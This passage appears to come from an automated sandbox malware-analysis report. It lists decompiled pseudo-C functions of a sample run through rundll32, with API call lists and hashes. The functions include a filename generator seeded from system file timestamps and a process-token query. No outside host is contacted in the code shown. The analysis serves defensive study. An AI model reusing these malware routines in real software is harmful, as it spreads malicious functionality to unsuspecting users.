                                          					_t5 =  *0x4bfd2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x4bfd26c; // 0x3d0
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x4bfd238; // 0x6ce0000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04BF6F2D), ref: 04BF78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04BF78C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 04BF78E8
                                          • HeapDestroy.KERNEL32(06CE0000), ref: 04BF78F8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 7c22495fd2df92332fcbbb461e4493caa4d10c2ddccfbcb6943fb06a8e8c722b
                                          • Instruction ID: 1250507034ba265cf67cabdb92445738605cd0856389b5b1607c35fd89828019
                                          • Opcode Fuzzy Hash: 7c22495fd2df92332fcbbb461e4493caa4d10c2ddccfbcb6943fb06a8e8c722b
                                          • Instruction Fuzzy Hash: B1F0A031A01305A7EB105BBADD48F467BACEB0475071402A2BD0ED3280CF38EC45D6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E04BF4C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x4bfd324; // 0x70d95b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x4bfd324; // 0x70d95b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x4bfd030) {
                                          					HeapFree( *0x4bfd238, 0, _t8);
                                          				}
                                          				_t14[1] = E04BF7C75(_v0, _t14);
                                          				_t11 =  *0x4bfd324; // 0x70d95b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF4C75
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF4C91
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 4c2a55fd57b443b968bf97e635fda43427f08c672ab8c1d21b96345f8cd12768
                                          • Instruction ID: bd0284ccb57d36f244bfa44460387ed08f317c1def340f02dd363bb125d8f36b
                                          • Opcode Fuzzy Hash: 4c2a55fd57b443b968bf97e635fda43427f08c672ab8c1d21b96345f8cd12768
                                          • Instruction Fuzzy Hash: A8F0DA716002409BE7109F78EE48F167BE8EB24745B055546FA0ED7250E728EC99DA29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04BF9B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x4bfd324; // 0x70d95b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x4bfd324; // 0x70d95b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x4bfd324; // 0x70d95b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x4bfe845) {
                                          					HeapFree( *0x4bfd238, 0, _t10);
                                          					_t7 =  *0x4bfd324; // 0x70d95b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF9B51
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF9B66
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: b5f3a93a6026a651b36c89cdc70dcb4d2022acb6f15bf2e2f5c2124fb5bd00bb
                                          • Instruction ID: 2e2194bffe17f8723eee8fbc9d80a36b4b8a5a58ca441dbe140ad1fae7090e7e
                                          • Opcode Fuzzy Hash: b5f3a93a6026a651b36c89cdc70dcb4d2022acb6f15bf2e2f5c2124fb5bd00bb
                                          • Instruction Fuzzy Hash: 14F0D4B56002009BEB189F74ED59F253BF9EB18301B05404AEB0ED7691C638EC89CA34
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04BF6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E04BF58BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E04BF58BE(_t28);
                                          					if(_t30 == 0) {
                                          						E04BF147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E04BFA8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E04BFA8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000), ref: 04BF6B7A
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                            • Part of subcall function 04BFA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04BF6BA8,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102), ref: 04BFA8E0
                                            • Part of subcall function 04BFA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?), ref: 04BF6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BF4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 247dd5ff863342da5dbee7bae5ff6220e73ebfc64783c54de8c2eef2610cd68f
                                          • Instruction ID: db489cb13978c57ae45619cc395c07dcd44ec670b2b87c24111867f02c13b955
                                          • Opcode Fuzzy Hash: 247dd5ff863342da5dbee7bae5ff6220e73ebfc64783c54de8c2eef2610cd68f
                                          • Instruction Fuzzy Hash: 7421B771504259BFDB115FB8CC44A9B7FB8EF05384B058095FE4C9B202E775E94A97B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E04BF58BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,070D937C,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF5FDB
                                          • lstrlenW.KERNEL32(04BF694E,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF5FE2
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF6002
                                          • memcpy.NTDLL(751469A0,04BF694E,00000002,00000000,004F0053,751469A0,?,?,04BF694E,004F0053,070D937C), ref: 04BF6015
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: e75394299d74dbd8a15937c258270a5c1b3e26f838cced9498f96f0a849d2a48
                                          • Instruction ID: 67b6da31a0e49e696a6fc541a4941602e233a3cc973c5c02545366d900d243f2
                                          • Opcode Fuzzy Hash: e75394299d74dbd8a15937c258270a5c1b3e26f838cced9498f96f0a849d2a48
                                          • Instruction Fuzzy Hash: 38F04F72900118BF9F11DFA8CC85C9F7BACEF182587154462EE08D7201E735EE159BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                          • lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 34bea32c75955c5a12639123c89ae1cd6e926d896130878027d253090e808d4f
                                          • Instruction ID: f4dec64824a0ec1e7250a3303b43152c82dbd3f7435d5450d21fe64693304574
                                          • Opcode Fuzzy Hash: 34bea32c75955c5a12639123c89ae1cd6e926d896130878027d253090e808d4f
                                          • Instruction Fuzzy Hash: 1FE01233805625BB87226BB4AC08C4FBFB9FF892507054956FA5893114C735D8158BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04C032BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x4c0d2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x4c0d238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x4c0d2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x4c0d238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x4c0d238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x4c0d2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x4c0e7e8; // 0x73797325
                                          				_t83 = E04C077E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x4c0d238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t16 = _t93 + 0x4c0e809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}












































                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04C032E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04C03307
                                          • memset.NTDLL ref: 04C03321
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04C0333A,73797325), ref: 04C077F7
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C07811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04C0335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04C03373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04C0338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04C03396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04C033D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C033ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C0340B
                                          • FindNextFileA.KERNELBASE(04C0207E,?), ref: 04C0341F
                                          • FindClose.KERNEL32(04C0207E), ref: 04C0342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C03438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C0345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04C0348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04C034C6
                                          • FindNextFileA.KERNELBASE(04C0207E,?), ref: 04C034DB
                                          • FindClose.KERNEL32(04C0207E), ref: 04C034E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C034F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C03504
                                          • FindClose.KERNEL32(04C0207E), ref: 04C03539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04C0354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C0355B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: b257b1cc7317eb6c4e809f60b873b39e0f60bea39810a47e11a0064be6b3bfc5
                                          • Instruction ID: c3b792216af3722d6eb971207285e1c314a0aac9e65f342431b09b8a59978ef5
                                          • Opcode Fuzzy Hash: b257b1cc7317eb6c4e809f60b873b39e0f60bea39810a47e11a0064be6b3bfc5
                                          • Instruction Fuzzy Hash: 57815C75D00159AFDF119FE5DC84AEEBBB9EF44304F11816AE905E62A0D734AE84CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04C071B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E04C058BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E04C0147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04C07200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04C07213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C0722F
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C0724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04C07259
                                          • NtClose.NTDLL(?), ref: 04C0726B
                                          • NtClose.NTDLL(00000000), ref: 04C07275
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 6791736ea0966cd07c481110f1f23e6c4748ad3288befe2d51032b1f92085496
                                          • Instruction ID: 240ae57e7b6782a75502ab1c243508f405b44d64b0427ed4192dcbd1c5f20ed4
                                          • Opcode Fuzzy Hash: 6791736ea0966cd07c481110f1f23e6c4748ad3288befe2d51032b1f92085496
                                          • Instruction Fuzzy Hash: A221E6B6900218FBDB019F95CC85ADEBFBDFF48740F108166FA00A6150D7B5AB44EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04C01754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
